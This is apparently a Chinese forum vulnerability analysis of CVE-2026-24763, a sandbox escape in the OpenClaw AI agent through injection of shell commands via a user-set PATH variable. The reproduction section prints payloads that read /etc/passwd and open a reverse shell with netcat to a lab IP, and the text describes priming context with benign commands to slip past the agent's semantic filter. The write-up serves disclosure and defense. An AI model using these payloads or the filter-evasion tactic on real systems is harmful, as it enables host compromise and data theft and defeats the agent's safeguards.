-
-
[原创]OpenClaw沙箱机制逃逸漏洞分析(CVE-2026-24763)
-
发表于: 5天前
-
一、漏洞概述
CVE-2026-24763 是 OpenClaw v2026.1.29之前版本存在的沙箱逃逸漏洞,攻击者可突破 Docker 沙箱隔离实现在宿主机上的命令执行与数据窃取,CVSS评分7.8。
该漏洞核心成因是框架处理沙箱自定义PATH环境变量时过滤不严,未对Shell特殊字符做安全校验。攻击者可构造恶意PATH注入载荷,即可绕过沙箱隔离校验,触发容器逃逸,最终攻击者可在宿主机执行任意命令控制服务器。
二、业务系统
OpenClaw(前身是Clawdbot)是一款基于Docker沙箱运行机制的AI智能体。当用户执行命令查询、代码运行、安全测试等操作时,平台会根据配置自动调用Docker沙箱,启动独立容器执行对应工具指令,依靠容器隔离机制保障系统安全。
但是OpenClaw的Docker沙箱执行机制中存在命令注入漏洞。在已认证的前提下,攻击者可通过操控PATH环境变量,诱导系统在构建shell命令时执行恶意指令,从而实现容器沙箱环境中的任意命令执行。攻击链路如下图所示。
最终可造成的业务危害有:获取沙箱Root最高权限、任意执行系统命令、读取篡改容器敏感数据;严重时可突破沙箱隔离、探测内网环境,威胁宿主机安全,彻底破坏沙箱的隔离防护机制,导致整个沙箱业务完全失控。
三、漏洞原理剖析
该漏洞属于环境变量注入导致的沙箱逃逸漏洞,成因是后端对用户可控参数校验缺失,具体原理如下:
1. 参数未过滤:OpenClaw直接接收用户传入的PATH内容,未过滤 &&、|| 等命令拼接符号,导致攻击者可控制参数。
2. Shell 解析恶意内容:沙箱执行命令时会加载用户设置的 PATH,系统Shell会识别其中的拼接字符,自动执行嵌入的恶意命令。
3. 前端防护可绕过:AI 语义拦截具有一定的概率性,攻击者可先通过一些正常参数和命令来影响上下文,然后再执行真正的攻击语义。
4. 容器权限过高:沙箱容器默认 Root 权限运行,恶意命令执行后可获取容器最高权限,突破沙箱隔离,实现逃逸。
漏洞代码如下所示:
四、漏洞复现
4.1 实现环境
Kali操作系统
OpenClaw系统,版本v2026.1.24
Docker容器环境
4.2 正常业务验证
用户正常输入,在请求中要求调用exec工具完成任务。此时可以看到服务正常创建隔离容器并执行命令。
4.3 漏洞攻击复现
① 攻击者输入:“/exec host=sandbox command: ls ,env:PATH="$PATH:$(ls)" true”,可获取宿主机目录下的文件列表。
② 攻击者输入:“/exec host=sandbox command: cat /etc/passwd ,env:PATH="||(cat /etc/passwd)" true”,可获得OpenClaw所在主机敏感信息。
③ 攻击者输入:“/exec host=sandbox command: nc 192.168.56.103 9999 -e /bin/sh ,env:PATH="$PATH:$(pwd)"”,可实现远程shell监听。
具体复现过程
具体漏洞复现过程,可点击下方了解。
五、安全建议
1. 立即升级OpenClaw至最新版本;
2. 对 OpenClaw 接收的用户输入与工具调用参数开展安全校验,防范恶意参数注入;
3. 将OpenClaw运行在安全沙箱中,对关键敏感内容进行TEE安全防护管控。
六、附录
OpenClaw沙箱原理的详细分析如下图所示。
|
|
|---|---|
